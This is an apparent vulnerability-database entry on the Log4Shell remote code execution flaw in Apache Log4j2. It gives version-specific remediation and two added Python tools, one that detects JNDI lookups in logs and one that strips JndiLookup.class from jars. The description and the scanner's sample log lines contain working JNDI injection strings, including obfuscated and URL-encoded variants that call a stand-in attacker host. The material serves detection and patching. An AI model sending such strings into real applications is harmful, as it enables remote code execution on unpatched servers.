Apache Log4j2 JNDI Remote Code Execution - Vulnerability Database

Apache Log4j2 JNDI Remote Code Execution

Description

Apache Log4j2 versions 2.0-beta9 through 2.14.1 contain a critical remote code execution vulnerability in the JNDI (Java Naming and Directory Interface) lookup feature of this widely used Java logging library. Log4j2 performs lookup substitution on ${...} patterns found in log messages, so an attacker who can get a string such as ${jndi:ldap://attacker.example/a} into any value the application logs (a User-Agent header, a username, a form field) makes the library contact an attacker-controlled LDAP, RMI or other JNDI server. The server's reply can point the JVM at attacker-supplied code, which is then loaded and executed with the privileges of the application. This vulnerability, known as Log4Shell (CVE-2021-44228), affects countless applications worldwide that use Log4j2 for logging.
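As an added example (not Invicti's code or the Log4j project's), here is how the lookup substitution described above can be turned into detection logic for access or application logs. Log4j resolves nested ${...} expressions from the inside out, which attackers abuse to hide the string "jndi"; the scanner replays the few lookups used for that (${lower:...}, ${upper:...} and the ${name:-default} fallback), URL-decodes, and then flags whatever ${jndi:...} remains. The log lines and the 203.0.113.0/24 addresses are constructed for the example.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Innermost ${...} expression: no further "${" or "}" between the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup that survives normalisation; the whole target (scheme,
# host, port, path) is captured for reporting.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([^}]*)\}", re.IGNORECASE)


def _resolve_inner(match: "re.Match[str]") -> str:
    """Evaluate one innermost lookup the way Log4j's substitutor does for the
    lookups attackers use to hide "jndi". Anything else is returned unchanged
    so that normalize() terminates."""
    whole, inner = match.group(0), match.group(1)
    key, _, value = inner.partition(":")
    key = key.strip().lower()
    if key == "jndi":
        return whole                   # the payload itself: keep it for matching
    if ":-" in inner:                  # ${name:-default} -> default (e.g. ${::-j})
        return inner.split(":-", 1)[1]
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    return whole


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, text)
        if new == text:
            break
        text = new
    return text


def scan_line(line: str) -> List[Dict[str, str]]:
    """One finding per JNDI lookup in a log line; URL-decoded first because
    %24%7Bjndi... is a common way to slip past naive string matching."""
    norm = normalize(unquote(line))
    return [{"payload": m.group(0), "target": m.group(1).strip()}
            for m in _JNDI.finditer(norm)]


def scan_log(lines: List[str]) -> List[Tuple[int, Dict[str, str]]]:
    return [(i, hit) for i, line in enumerate(lines) for hit in scan_line(line)]


# Constructed Combined-format access-log lines; the User-Agent is the last field.
_PREFIX = '203.0.113.9 - - [10/Dec/2021:22:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
SAMPLE_LOG = [
    _PREFIX + '"Mozilla/5.0"',
    _PREFIX + '"${jndi:ldap://203.0.113.5:1389/a}"',
    _PREFIX + '"${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b}"',
    _PREFIX + '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/c}"',
    _PREFIX + '"${${env:NaN:-j}ndi:dns://203.0.113.5/d}"',
    _PREFIX + '"%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%3A1389%2Fe%7D"',
    _PREFIX + '"price=${amount} built ${date:yyyy}"',   # benign ${...}, must not fire
]

if __name__ == "__main__":
    for idx, hit in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {hit['target']}  <- {hit['payload']}")
```

The target field gives you the callback host to block and to search for in outbound LDAP/RMI/DNS traffic; a hit in the log only proves an attempt, so correlate with egress connections from the JVM to confirm exploitation.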

Remediation

Immediately upgrade to Apache Log4j2 version 2.17.0 or later (2.12.4 for Java 7, 2.3.2 for Java 6). These releases remove message lookup substitution entirely and keep JNDI functionality disabled unless it is explicitly re-enabled with the log4j2.enableJndiLookup system property; do not set that property.

For systems that cannot be immediately upgraded:

1. For Log4j2 versions 2.10.0 through 2.14.1: set the system property log4j2.formatMsgNoLookups to true by adding the following JVM argument (releases before 2.10.0 ignore the property, so it gives no protection there):

-Dlog4j2.formatMsgNoLookups=true

2. Alternative mitigation, valid for every affected 2.x release: remove the JndiLookup class from the log4j-core JAR file and restart the JVM. Repeat for every copy of the JAR, including copies packaged inside WAR/EAR files and shaded ("fat") JARs:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

3. Environment variable option (same 2.10.0 minimum as option 1, useful where the JVM command line cannot be changed):
LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Options 1 and 3 are stopgaps only: Apache later found that they do not cover configurations whose layout pattern itself pulls in attacker-controlled data through lookups (for example a non-default PatternLayout with Context Lookups or Thread Context Map patterns), which is why removing JndiLookup.class or upgrading is preferred.


Additional protection: ensure Java 8u121 or later is installed, which sets com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false by default (8u191 and later do the same for com.sun.jndi.ldap.object.trustURLCodebase), so the JVM will not load classes from a remote codebase named in a JNDI reference. This is defense in depth only: an attacker's LDAP server can still return serialized Java objects or reference a factory class that is already on the application's classpath, so a current JVM does not make a vulnerable Log4j2 safe.

Note: versions 2.15.0 and 2.16.0 contain incomplete fixes and should not be used as the final remediation. Verify that all direct and transitive dependencies are updated, as Log4j2 is commonly pulled in indirectly through other libraries and bundled inside application archives; check the deployed artifacts on disk, not just the build file.
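Step 2 and the note about transitive dependencies both come down to the same job: find every copy of log4j-core on a host, including copies nested inside WAR/EAR or fat JARs, and remove JndiLookup.class from the ones below the fixed versions. The following is an added example in Python (not Invicti's or the Log4j project's code) that does that with the standard zipfile module; rewriting the archive without the entry has the same effect as the zip -d command above and needs no zip binary. Version thresholds follow the remediation text above. The jars it scans in run_demo() are constructed stand-ins built in a temporary directory; only the manifest field names (Implementation-Title, Implementation-Version) match what a real log4j-core jar ships.

```python
import io, os, re, shutil, tempfile, zipfile
from typing import Dict, List, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PKG = "org/apache/logging/log4j/core/"
ARCHIVES = (".jar", ".war", ".ear", ".zip")
_VER = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")

def needs_upgrade(version: Optional[str]) -> bool:
    """True below the fixed releases named above: 2.17.0, or 2.12.4 / 2.3.2 for the
    Java 7 / Java 6 lines. Unknown or unparsable versions count as vulnerable."""
    m = _VER.match(version or "")
    if not m: return True
    v = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    return v < {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}.get(v[:2], (2, 17, 0))

def _version_of(zf: zipfile.ZipFile) -> Optional[str]:
    """Implementation-Version from the jar's own manifest, if it is log4j-core's."""
    raw = zf.read("META-INF/MANIFEST.MF") if "META-INF/MANIFEST.MF" in zf.namelist() else b""
    fields = dict(l.split(":", 1) for l in raw.decode("utf-8", "replace").splitlines() if ":" in l)
    if fields.get("Implementation-Title", "").strip() != "Apache Log4j Core":
        return None  # shaded/fat jars carry another project's manifest: version unknown
    return fields.get("Implementation-Version", "").strip() or None

def inspect_bytes(data: bytes, name: str) -> List[Dict]:
    """Report every archive carrying log4j-core classes, recursing into nested ones."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if any(n.startswith(CORE_PKG) for n in names):
            version, present = _version_of(zf), JNDI_CLASS in names
            findings.append({"archive": name, "version": version, "has_jndi_lookup": present,
                             "needs_action": present and needs_upgrade(version)})
        for n in names:
            if n.lower().endswith(ARCHIVES):
                inner = zf.read(n)
                if zipfile.is_zipfile(io.BytesIO(inner)):
                    findings += inspect_bytes(inner, f"{name}!/{n}")
    return findings

def strip_jndi_bytes(data: bytes) -> Tuple[bytes, int]:
    """Copy of the archive without JndiLookup.class (what zip -d does), descending
    into nested jars. Second value: number of copies removed."""
    removed, out = 0, io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                removed += 1; continue
            payload = src.read(info.filename)
            if info.filename.lower().endswith(ARCHIVES) and zipfile.is_zipfile(io.BytesIO(payload)):
                payload, n = strip_jndi_bytes(payload)
                removed += n
            dst.writestr(info, payload)  # keeps the entry's name, timestamp and method
    return out.getvalue(), removed

def scan_tree(root: str) -> List[Dict]:
    results = []
    for dirpath, _, files in os.walk(root):
        for path in (os.path.join(dirpath, f) for f in sorted(files) if f.lower().endswith(ARCHIVES)):
            if zipfile.is_zipfile(path):
                with open(path, "rb") as fh: results += inspect_bytes(fh.read(), path)
    return results

def _write(path: str, data: bytes) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh: fh.write(data)

def remediate_file(path: str) -> int:
    """Rewrite one on-disk archive in place; restart the JVM afterwards."""
    with open(path, "rb") as fh: new, removed = strip_jndi_bytes(fh.read())
    if removed:
        _write(path + ".tmp", new)
        os.replace(path + ".tmp", path)  # atomic swap: never a half-written jar
    return removed

def _fake_log4j_core(version: str) -> bytes:
    """Constructed stand-in for a log4j-core jar: manifest plus two stub class entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nImplementation-Title: "
                    f"Apache Log4j Core\r\nImplementation-Version: {version}\r\n")
        zf.writestr(CORE_PKG + "Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def run_demo() -> Dict:
    """Throwaway tree: a vulnerable jar, a fixed jar (still ships JndiLookup.class, but
    disabled) and a WAR with a nested vulnerable jar. Scan, strip where needed, rescan."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    try:
        for v in ("2.14.1", "2.17.1"):
            _write(os.path.join(root, "lib", f"log4j-core-{v}.jar"), _fake_log4j_core(v))
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/web.xml", "<web-app/>")
            zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
        _write(os.path.join(root, "webapps", "app.war"), war.getvalue())
        before = scan_tree(root)
        removed = sum(remediate_file(f["archive"].split("!/")[0]) for f in before if f["needs_action"])
        return {"before": before, "after": scan_tree(root), "removed": removed}
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Against a real installation, call scan_tree("/opt/app") (path is illustrative), review the findings whose needs_action is set, and pass the top-level file part of each archive name to remediate_file(). Stop the JVM before rewriting and start it again afterwards: a running process already has the class loaded, so editing the jar alone changes nothing until restart. The fixed 2.17.1 jar in the demo deliberately keeps JndiLookup.class, mirroring the real releases where the class exists but is disabled, so presence of the class alone is not a vulnerability signal; the version is.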
